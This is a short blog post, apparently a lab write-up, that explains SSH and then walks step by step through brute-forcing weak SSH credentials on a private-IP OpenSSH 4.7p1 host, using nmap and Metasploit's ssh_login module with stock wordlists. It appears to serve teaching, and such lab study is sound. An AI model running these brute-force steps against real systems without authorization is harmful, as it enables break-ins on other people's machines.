# SSH Weak Credentials Exploitation

2 min read
security exploit ssh
Table of Contents

1. What is SSH?

SSH (Secure Shell) is a network protocol used to securely access and manage systems over a TCP/IP network. It typically runs on port 22 and provides encrypted communication between client and server.

SSH supports:

  • Secure remote login
  • Encrypted command execution
  • Secure file transfer (SCP, SFTP)

2. How SSH Works

SSH works on a client-server architecture:

  • Port 22: Used for secure communication

Process:

  1. Client connects to the SSH server
  2. Server presents its public key
  3. Client verifies the server
  4. User authenticates using password or key
  5. Secure shell access is established

3. Vulnerability Exploited

Vulnerability Name:

Weak Credentials in SSH Service

Type:

Authentication Weakness / Brute Force

CVE:

N/A (Configuration-based vulnerability)

Description:

The service running on port 22/tcp is identified as OpenSSH 4.7p1 Debian 8ubuntu1. The SSH service is vulnerable due to weak or default credentials, allowing attackers to gain unauthorized access through brute-force attacks using automated tools.

4. How the Exploit Works (Concept)

  • The attacker scans the target and finds SSH running on port 22.
  • The service version is identified as OpenSSH 4.7p1.
  • The attacker uses a brute-force module in Metasploit.
  • Multiple username and password combinations are attempted.
  • Valid credentials are discovered.
  • The attacker logs in and gains secure shell access.

5. Exploitation

Recon using Nmap

Terminal window
nmap -sV 192.168.72.130

Step 1: Start Metasploit

Terminal window
msfconsole

Step 2: Search for SSH modules

Terminal window
search ssh

Step 3: Use SSH login module

Terminal window
use auxiliary/scanner/ssh/ssh_login

Step 4: Set target IP

Terminal window
set RHOSTS <target-ip>

Step 5: Set username and password list

Terminal window
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt

Step 6: Run the module

Terminal window
run

Step 7: Get a shell using valid credentials

Terminal window
use auxiliary/scanner/ssh/ssh_login
set USERNAME <found-user>
set PASSWORD <found-password>
set RHOSTS <target-ip>
run

6. Result

  • Metasploit successfully discovers valid SSH credentials.

  • Secure shell access is obtained on the target machine.

  • Commands can be executed with the privileges of the authenticated user.

Example:

Terminal window
whoami
My avatar

Thanks for reading my blog post! Feel free to check out my other posts or contact me via the social links in the footer.

More Posts
Comments